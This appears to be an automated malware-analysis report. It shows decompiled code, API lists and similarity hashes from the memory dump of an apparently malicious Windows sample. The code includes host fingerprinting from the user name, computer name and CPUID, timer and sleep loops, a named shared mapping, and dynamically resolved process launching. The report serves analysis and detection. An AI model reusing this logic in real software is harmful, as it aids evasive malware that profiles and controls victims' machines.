				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4e90000;
				_t115 = _t139[3] + 0x4e90000;
				_t131 = _t139[4] + 0x4e90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4e90000;
				_v16 = _t139[5] + 0x4e90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4e90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4e9d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4e9d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4e9d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4e9d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4e9d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4e9d198; // 0x0
										 *_t102 = _t125;
										 *0x4e9d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4e9d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x04e9ac64
0x04e9ac7a
0x04e9ac80
0x04e9ac82
0x04e9ac87
0x04e9ac8d
0x04e9ac92
0x04e9ac95
0x04e9aca3
0x04e9acaa
0x04e9acad
0x04e9acb0
0x04e9acb1
0x04e9acb4
0x04e9acb7
0x04e9acba
0x04e9acbf
0x04e9acce
0x00000000
0x04e9acd4
0x04e9acde
0x04e9ace8
0x04e9aced
0x04e9acef
0x04e9acf9
0x04e9acfc
0x04e9acff
0x04e9ad05
0x04e9ad07
0x04e9ad07
0x04e9ad0a
0x04e9ad0d
0x04e9ad12
0x04e9ad16
0x04e9ad29
0x04e9ad2b
0x04e9add3
0x04e9add3
0x04e9adda
0x04e9addd
0x04e9ade7
0x04e9ade7
0x04e9adeb
0x04e9ae69
0x04e9ae6c
0x04e9ae6e
0x04e9ae6e
0x04e9ae75
0x04e9ae77
0x04e9ae81
0x04e9ae84
0x04e9ae87
0x04e9ae87
0x00000000
0x04e9aded
0x04e9adf0
0x04e9ae1e
0x04e9ae28
0x04e9ae2c
0x04e9ae34
0x04e9ae37
0x04e9ae3e
0x04e9ae48
0x04e9ae48
0x04e9ae4c
0x04e9ae51
0x04e9ae60
0x04e9ae66
0x04e9ae66
0x04e9ae4c
0x00000000
0x04e9adf7
0x04e9adfa
0x04e9ae02
0x04e9ae17
0x04e9ae1c
0x00000000
0x00000000
0x04e9ae1c
0x00000000
0x04e9ae02
0x04e9adf0
0x04e9adeb
0x04e9ad31
0x04e9ad38
0x04e9ad48
0x04e9ad4b
0x04e9ad51
0x04e9ad55
0x04e9ad98
0x04e9ada4
0x04e9adcd
0x04e9ada6
0x04e9adaa
0x04e9adb0
0x04e9adb8
0x04e9adba
0x04e9adbd
0x04e9adc3
0x04e9adc5
0x04e9adc5
0x04e9adb8
0x04e9adaa
0x00000000
0x04e9ada4
0x04e9ad5d
0x04e9ad60
0x04e9ad67
0x04e9ad77
0x04e9ad7a
0x04e9ad8a
0x00000000
0x04e9ad90
0x04e9ad71
0x04e9ad75
0x00000000
0x00000000
0x00000000
0x04e9ad75
0x04e9ad42
0x04e9ad46
0x00000000
0x00000000
0x00000000
0x04e9ad46
0x04e9ad1f
0x04e9ad23
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04E9ACCE
LoadLibraryA.KERNELBASE(?), ref: 04E9AD4B
GetLastError.KERNEL32 ref: 04E9AD57
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04E9AD8A

Strings

$, xrefs: 04E9ACA3

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 869fa11657336dbe2c38708172b4ecc99e930c9464af69aa090c2bd0976f5a3e
Instruction ID: aa902c30839831292071ec5b8717d8a750154a4472bb193299e8356d21d79822
Opcode Fuzzy Hash: 869fa11657336dbe2c38708172b4ecc99e930c9464af69aa090c2bd0976f5a3e
Instruction Fuzzy Hash: E9813B75A00345AFDF20DF99D884AAEB7F5EF48319F14912AE905E7280EBB4ED44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E951B0, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E04E951B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				long _t67;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4e9d240);
					_v20 = 0;
					_v16 = 0;
					L04E9AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4e9d26c; // 0x2c4
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4e9d24c = 5;
						} else {
							_t68 = E04E98D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4e9d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04E9A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E04E936B1(_t72, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4e9d244);
							goto L21;
						} else {
							__eflags =  *0x4e9d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04E96761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4e9d248);
								L21:
								L04E9AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x4e9d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x04e951b0
0x04e951c2
0x04e951c5
0x04e951d1
0x04e951d7
0x04e951dc
0x04e95343
0x04e951e2
0x04e951e2
0x04e951e4
0x04e951e9
0x04e951ea
0x04e951f0
0x04e951f3
0x04e951f6
0x04e95204
0x04e9520f
0x04e95212
0x04e95214
0x04e95221
0x04e9522b
0x04e9522d
0x04e95232
0x04e95237
0x04e95242
0x04e95242
0x04e95239
0x04e95239
0x04e95240
0x00000000
0x00000000
0x04e95240
0x04e9524c
0x00000000
0x04e9524f
0x04e95253
0x04e9525e
0x04e9525e
0x04e95265
0x04e9526e
0x04e95275
0x04e9527e
0x04e95281
0x04e95284
0x04e95289
0x04e9528e
0x00000000
0x00000000
0x04e95290
0x04e95293
0x04e95296
0x04e95299
0x00000000
0x04e9529b
0x04e952a5
0x04e952aa
0x04e952aa
0x00000000
0x04e952d8
0x04e952d8
0x04e952dd
0x04e952fc
0x04e952fe
0x04e95303
0x04e95304
0x00000000
0x04e952df
0x04e952df
0x04e952e5
0x00000000
0x04e952e7
0x04e952e7
0x04e952ec
0x04e952ee
0x04e952f3
0x04e952f4
0x04e9530a
0x04e9530a
0x04e95312
0x04e9531d
0x04e95320
0x04e9532b
0x04e9532d
0x04e95330
0x04e95332
0x00000000
0x04e95338
0x00000000
0x04e95338
0x04e95332
0x04e952e5
0x00000000
0x04e952dd
0x04e952ad
0x04e952af
0x04e952b2
0x04e952b3
0x04e952b3
0x04e952b7
0x04e952c1
0x04e952c1
0x04e952c7
0x04e952ca
0x04e952ca
0x04e952d0
0x04e952d0
0x04e9534d
0x00000000

APIs

memset.NTDLL ref: 04E951C5
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04E951D1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 04E951F6
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04E95212
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04E9522B
HeapFree.KERNEL32(00000000,00000000), ref: 04E952C1
CloseHandle.KERNEL32(?), ref: 04E952D0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04E9530A
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04E95D5E,?), ref: 04E95320
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04E9532B

Part of subcall function 04E98D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05849368,00000000,?,73BCF710,00000000,73BCF730), ref: 04E98D63
Part of subcall function 04E98D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058493A0,?,00000000,30314549,00000014,004F0053,0584935C), ref: 04E98E00
Part of subcall function 04E98D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04E9523E), ref: 04E98E12

GetLastError.KERNEL32 ref: 04E9533D

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 7da7374b3449430519ac2a649ca7dd54ee6252c40f0fdd8dffa0d52b42cea7ba
Instruction ID: ed0f3469b8967d73e6faaa3c681b682c5824164076498932e6690b0a3b004db6
Opcode Fuzzy Hash: 7da7374b3449430519ac2a649ca7dd54ee6252c40f0fdd8dffa0d52b42cea7ba
Instruction Fuzzy Hash: 6B515C71801228BBDF16EF95DD44DEEBFB8EF49724F204216E810A22C4D774AE40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E9232F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E04E9232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04E9AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4e9d2a8; // 0x9aa5a8
				_t5 = _t13 + 0x4e9e87e; // 0x5848e26
				_t6 = _t13 + 0x4e9e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04E9ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4e9d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x04e9232f
0x04e92337
0x04e9233b
0x04e92341
0x04e92346
0x04e9234b
0x04e9234e
0x04e92351
0x04e92356
0x04e92357
0x04e9235a
0x04e9235f
0x04e92366
0x04e92370
0x04e92372
0x04e92373
0x04e92376
0x04e92392
0x04e92398
0x04e9239c
0x04e923ea
0x04e9239e
0x04e923ab
0x04e923bb
0x04e923c3
0x04e923d5
0x04e923d9
0x00000000
0x00000000
0x04e923c5
0x04e923c8
0x04e923cd
0x04e923cf
0x04e923cf
0x04e923ad
0x04e923af
0x04e923db
0x04e923dc
0x04e923dc
0x04e923ab
0x04e923f1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04E95C31,?,?,4D283A53,?,?), ref: 04E9233B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04E92351
_snwprintf.NTDLL ref: 04E92376
CreateFileMappingW.KERNELBASE(000000FF,04E9D2AC,00000004,00000000,00001000,?), ref: 04E92392
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04E95C31,?,?,4D283A53), ref: 04E923A4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04E923BB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04E95C31,?,?), ref: 04E923DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04E95C31,?,?,4D283A53), ref: 04E923E4

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 134aa39ddbfd6133f63648899cf52c2eff79f5a1f5e981a080bdf9de5c597245
Instruction ID: da2c18e255b2cade9ee230fd9fcda886b47511559f0744993f82c886f7e7f8a2
Opcode Fuzzy Hash: 134aa39ddbfd6133f63648899cf52c2eff79f5a1f5e981a080bdf9de5c597245
Instruction Fuzzy Hash: B7219D72640204BBDF21EFA9DC45FAE77E9EB48715F244562FA05E61C0EA70AD088B51

Uniqueness

Uniqueness Score: -1.00%

Function 04E912E5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E04E912E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4e9d238 = _t10;
				if(_t10 != 0) {
					 *0x4e9d1a8 = GetTickCount();
					_t12 = E04E93E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L04E9B08A();
							_t33 = _t14 + _t16;
							_t18 = E04E95548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04E94DA2(_t25) != 0) {
							 *0x4e9d260 = 1; // executed
						}
						_t12 = E04E95BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x04e912e5
0x04e912eb
0x04e912ec
0x04e912f8
0x04e912fe
0x04e91305
0x04e91315
0x04e9131a
0x04e91321
0x04e91323
0x04e91328
0x04e9132e
0x04e91334
0x04e9133e
0x04e91342
0x04e91344
0x04e91349
0x04e9134a
0x04e9134b
0x04e91350
0x04e91356
0x04e9135f
0x04e91360
0x04e91365
0x04e9136b
0x04e91377
0x04e91379
0x04e91379
0x04e91383
0x04e91383
0x04e91307
0x04e91309
0x04e91309
0x04e9138d

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04E94EF2,?), ref: 04E912F8
GetTickCount.KERNEL32 ref: 04E9130C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04E94EF2,?), ref: 04E91328
SwitchToThread.KERNEL32(?,00000001,?,?,?,04E94EF2,?), ref: 04E9132E
_aullrem.NTDLL(?,?,00000009,00000000), ref: 04E9134B
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04E94EF2,?), ref: 04E91365

Strings

ST, xrefs: 04E91315

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID: ST
API String ID: 507476733-429985766
Opcode ID: da344b9190cf451ebd443f637fe33699743125a94515a55a0cc0289166cd0ec6
Instruction ID: 082cef1145f7e479b73dc9bd428424c9fea6aacbb40ffa3b9aacddf0ac4a8ae7
Opcode Fuzzy Hash: da344b9190cf451ebd443f637fe33699743125a94515a55a0cc0289166cd0ec6
Instruction Fuzzy Hash: 3F11A572A44301BFFB10AB66DC09FAE7BE8EB44356F105616F945D62C0EEB4EC008761

Uniqueness

Uniqueness Score: -1.00%

Function 04E99135, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E04E99135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4e9d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04E9A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4e9d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4e9d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04E97306(_v8 + _v8, _t64);
							}
							HeapFree( *0x4e9d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4e9d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04E97306(_v8 + _v8, _t64);
						}
						HeapFree( *0x4e9d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x04e99135
0x04e9913d
0x04e99141
0x04e99144
0x04e99149
0x04e9914b
0x04e99150
0x04e99150
0x04e99156
0x04e99158
0x04e99165
0x04e991c6
0x04e99167
0x04e9916c
0x04e99172
0x04e99177
0x04e99185
0x04e99189
0x04e99198
0x04e9919f
0x04e991a6
0x04e991a6
0x04e991b1
0x04e991b1
0x04e99189
0x04e99177
0x04e991c8
0x04e991ce
0x04e991d8
0x04e991da
0x04e991df
0x04e991ee
0x04e991f2
0x04e991fd
0x04e99204
0x04e9920b
0x04e9920b
0x04e99217
0x04e99217
0x04e991f2
0x04e99222
0x04e99224
0x04e99227
0x04e99229
0x04e9922c
0x04e9922f
0x04e99239
0x04e9923d
0x04e99241

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 04E9916C
RtlAllocateHeap.NTDLL(00000000,?), ref: 04E99183
GetUserNameW.ADVAPI32(00000000,?), ref: 04E99190
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04E95D20), ref: 04E991B1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04E991D8
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04E991EC
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04E991F9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04E95D20), ref: 04E99217

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: aa541725621506bf38290914d98d9147ab7c6fb88978540b62808f3d0e399c76
Instruction ID: ce685a9706062a55cb64504a8396bec4b29eeae6f1f66c8006018b15023364cd
Opcode Fuzzy Hash: aa541725621506bf38290914d98d9147ab7c6fb88978540b62808f3d0e399c76
Instruction Fuzzy Hash: A93117B1A00205EFEB10DFAADD80AAEB7F9FF44205F21456AE504D7295EB34EE019B10

Uniqueness

Uniqueness Score: -1.00%

Function 04E98EA1, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E04E98EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04E9592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04E9A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4e9d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4e9d2a8; // 0x9aa5a8
					_t18 = _t47 + 0x4e9e3e6; // 0x73797325
					_t68 = E04E93C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4e9d2a8; // 0x9aa5a8
						_t19 = _t50 + 0x4e9e747; // 0x5848cef
						_t20 = _t50 + 0x4e9e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04E9A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E04E9A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4e9d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04E9A734(_t70);
				goto L12;
			}

0x04e98ea9
0x04e98ea9
0x04e98eb8
0x04e98ebf
0x04e98ec4
0x04e98fd1
0x04e98fd8
0x04e98fd8
0x04e98ed3
0x04e98edb
0x04e98ede
0x04e98ee3
0x04e98ef8
0x04e98efe
0x04e98eff
0x04e98f02
0x04e98f08
0x04e98f0b
0x04e98f10
0x04e98f18
0x04e98f24
0x04e98f28
0x04e98fb8
0x04e98f2e
0x04e98f2e
0x04e98f33
0x04e98f3a
0x04e98f4e
0x04e98f52
0x04e98fa1
0x04e98f54
0x04e98f55
0x04e98f5c
0x04e98f75
0x04e98f77
0x04e98f7b
0x04e98f82
0x04e98f9c
0x04e98f84
0x04e98f8d
0x04e98f92
0x04e98f92
0x04e98f82
0x04e98fb0
0x04e98fb0
0x04e98f28
0x04e98fbf
0x04e98fc8
0x04e98fcc
0x00000000

APIs

Part of subcall function 04E9592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04E98EBD,?,00000001,?,?,00000000,00000000), ref: 04E95952
Part of subcall function 04E9592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04E95974
Part of subcall function 04E9592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04E9598A
Part of subcall function 04E9592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04E959A0
